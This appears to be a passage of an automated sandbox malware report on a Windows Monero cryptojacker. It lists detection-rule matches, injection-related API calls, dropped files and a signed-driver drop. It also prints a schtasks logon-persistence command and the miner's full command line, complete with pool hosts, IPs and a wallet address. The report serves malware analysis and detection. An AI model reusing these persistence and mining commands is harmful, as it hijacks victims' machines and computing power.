Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Detected potential crypto function
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFE106 1_2_0000025F5EFFE106
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFE4D6 1_2_0000025F5EFFE4D6
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFE90E 1_2_0000025F5EFFE90E
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFD4D2 1_2_0000025F5EFFD4D2
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFED6A 1_2_0000025F5EFFED6A
Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFA36125E22 1_2_00007FFA36125E22
Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFA36125076 1_2_00007FFA36125076
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FE4D6 9_2_000002C94E2FE4D6
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FE106 9_2_000002C94E2FE106
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FE90E 9_2_000002C94E2FE90E
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FD4D2 9_2_000002C94E2FD4D2
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FED6A 9_2_000002C94E2FED6A
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36149B74 9_2_00007FFA36149B74
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA361467BC 9_2_00007FFA361467BC
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36145E22 9_2_00007FFA36145E22
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36145076 9_2_00007FFA36145076
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36144B79 9_2_00007FFA36144B79
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FE4D6 15_2_000002A7810FE4D6
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FE106 15_2_000002A7810FE106
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FE90E 15_2_000002A7810FE90E
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FD4D2 15_2_000002A7810FD4D2
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FED6A 15_2_000002A7810FED6A
Contains functionality to call native functions
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401D58 NtAllocateVirtualMemory, 0_2_00401D58
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401D18 NtWriteVirtualMemory, 0_2_00401D18
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_004019D8 NtCreateThreadEx, 0_2_004019D8
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401D98 NtProtectVirtualMemory, 0_2_00401D98
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401C98 NtClose, 0_2_00401C98
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA3614A30E NtUnmapViewOfSection, 9_2_00007FFA3614A30E
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401D58 NtAllocateVirtualMemory, 13_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401D18 NtWriteVirtualMemory, 13_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_004019D8 NtCreateThreadEx, 13_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401D98 NtProtectVirtualMemory, 13_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401C98 NtClose, 13_2_00401C98
Creates driver files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: pcNCraWcRk.exe Virustotal: Detection: 64%
Source: pcNCraWcRk.exe Metadefender: Detection: 31%
Source: pcNCraWcRk.exe ReversingLabs: Detection: 81%
Source: pcNCraWcRk.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\pcNCraWcRk.exe 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64' Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: WR64.sys.9.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.evad.mine.winEXE@26/6@2/1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: pcNCraWcRk Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: pcNCraWcRk.exe Static file information: File size 2234368 > 1048576
Source: pcNCraWcRk.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00623B00 push rax; retf 0_2_00623B01
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00623BFF push rax; iretd 0_2_00623C01
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_006238C0 push rax; retn 0009h 0_2_006238C1
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00623AB7 push rax; retf 0009h 0_2_00623AC1
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EDE0000 push es; iretd 1_2_0000025F5EDE0098
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E0E0000 push es; iretd 9_2_000002C94E0E0098
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00409B00 push rax; retf 13_2_00409B01
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_004098C0 push rax; retn 0009h 13_2_004098C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00409BFF push rax; iretd 13_2_00409C01
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00409AB7 push rax; retf 0009h 13_2_00409AC1
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A780EE0000 push es; iretd 15_2_000002A780EE0098

Persistence and Installation Behavior:

barindex
Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Drops PE files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
